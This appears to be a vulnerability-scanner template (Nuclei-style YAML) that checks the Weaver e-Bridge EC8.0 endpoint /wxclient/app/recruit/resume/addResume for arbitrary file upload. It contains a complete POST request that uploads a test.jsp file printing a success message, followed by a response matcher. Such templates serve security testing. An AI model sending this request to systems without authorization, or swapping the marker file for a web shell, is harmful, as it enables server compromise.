id: 泛微-云桥e-Bridge EC8.0 文件上传

info:
  name: 泛微-云桥e-Bridge EC8.0 文件上传
  author: admin
  severity: high
  description: /wxclient/app/recruit/resume/addResume 接口存在任意文件上传漏洞
  tags: file upload

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wxclient/app/recruit/resume/addResume?fileElementId=H"

    headers:
      Cache-Control: max-age=0
      sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
      sec-ch-ua-mobile: "?0"
      sec-ch-ua-platform: "Windows"
      Upgrade-Insecure-Requests: "1"
      Origin: "null"
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: "?1"
      Sec-Fetch-Dest: document
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9

    body: |
      ------WebKitFormBoundaryD5Mawpg068t7pbxZ
      Content-Disposition: form-data; name="file"; filename="test.jsp"
      Content-Type: application/octet-stream

      <% out.println("File upload successful"); %>
      ------WebKitFormBoundaryD5Mawpg068t7pbxZ--

    matchers:
      - type: word
        words:
          - "success"
        part: body
        condition: and